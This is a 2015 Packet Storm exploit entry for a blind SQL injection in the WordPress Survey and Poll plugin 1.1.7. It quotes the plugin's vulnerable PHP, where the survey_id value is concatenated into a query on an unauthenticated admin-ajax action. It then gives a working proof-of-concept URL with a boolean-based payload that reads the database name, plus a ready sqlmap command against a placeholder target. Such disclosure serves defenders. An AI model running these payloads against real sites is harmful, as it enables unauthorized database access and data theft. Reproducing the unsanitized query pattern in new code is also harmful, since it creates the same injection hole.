WordPress Survey And Poll 1.1.7 Blind SQL Injection

2015-02-12T00:00:00
ID PACKETSTORM:130381
Type packetstorm
Reporter Securely
Modified 2015-02-12T00:00:00

Description

                                        
                                            `#################################################################  
# Exploit Title : Wordpress Survey and poll Blind SQL Injection  
  
# Data : 2015 – 02 - 11  
  
# Exploit Author : Securely (Yoo Hee man)  
  
# Plugin : WordPress Survey and Poll  
  
# Vender Homepage : http://modalsurvey.sympies.com  
  
# Tested On : Windows XP / sqlmap_v1.0  
  
# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip  
https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on)  
  
1. Detail   
- This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php  
- Settings.php file is no login cookie check  
- "survey_id" variable is not sanitized  
  
  
#################################################################  
public function ajax_survey()  
{  
global $wpdb;  
$survey_id = "";  
$survey_name = "";  
$survey_start_time = "";  
$survey_expiry_time = "";  
$survey_global = "";  
if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);  
else $survey_id = "";  
if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);  
else $survey_name = "";  
if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));  
else $survey_start_time = "";  
if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));  
else $survey_expiry_time = "";  
if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);  
else $survey_global = "";  
if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);  
else $survey_options = "";  
if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);  
else $survey_qa = "";  
$survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);  
if ($_REQUEST['sspcmd']=="save")  
{  
if ($survey_check>0) {  
//update survey  
$wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));  
$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));  
$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));  
$qa_object = (array)json_decode(stripslashes($survey_qa));  
$qa_array = (array)$qa_object;  
foreach($qa_array as $keyq=>$qr)  
{  
foreach($qr as $key=>$oa)  
{  
if ($key==0)  
{  
$wpdb->insert( $wpdb->prefix."wp_sap_questions", array(   
'id' => ($keyq+1),   
'survey_id' => $survey_id,   
'question' => $oa  
) );  
$qid = $wpdb->insert_id;  
}  
else  
{  
$oans = explode("->",$oa);  
$wpdb->insert( $wpdb->prefix."wp_sap_answers", array(   
'survey_id' => $survey_id,   
'question_id' => ($keyq+1),  
'answer' => $oans[0],  
'count' => $oans[1],  
'autoid' => $key  
) );   
}  
  
}  
}  
die("updated");  
}  
else {  
//insert survey  
$wpdb->insert( $wpdb->prefix."wp_sap_surveys", array(   
'id' => $survey_id,   
'name' => $survey_name,   
'options' => $survey_options,   
'start_time' => $survey_start_time,  
'expiry_time'=> $survey_expiry_time,  
'global'=> $survey_global  
) );  
$qa_object = (array)json_decode(stripslashes($survey_qa));  
$qa_array = (array)$qa_object;  
foreach($qa_array as $keyq=>$qr)  
{  
foreach($qr as $key=>$oa)  
{  
if ($key==0)  
{  
$wpdb->insert( $wpdb->prefix."wp_sap_questions", array(   
'id' => ($keyq+1),   
'survey_id' => $survey_id,   
'question' => $oa  
) );  
$qid = $wpdb->insert_id;  
}  
else  
{  
$oans = explode("->",$oa);  
$wpdb->insert( $wpdb->prefix."wp_sap_answers", array(   
'survey_id' => $survey_id,   
'question_id' => ($keyq+1),  
'answer' => $oans[0],  
'autoid' => $key  
) );   
}  
  
}  
}  
die('success');  
}  
################################################################  
  
2. POC  
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]  
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]  
  
3. Sqlmap  
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql  
  
  
3. Solution:  
Not patched  
  
4. Discovered By : Securely(Yoo Hee man)  
god2zuzu@naver.com  
`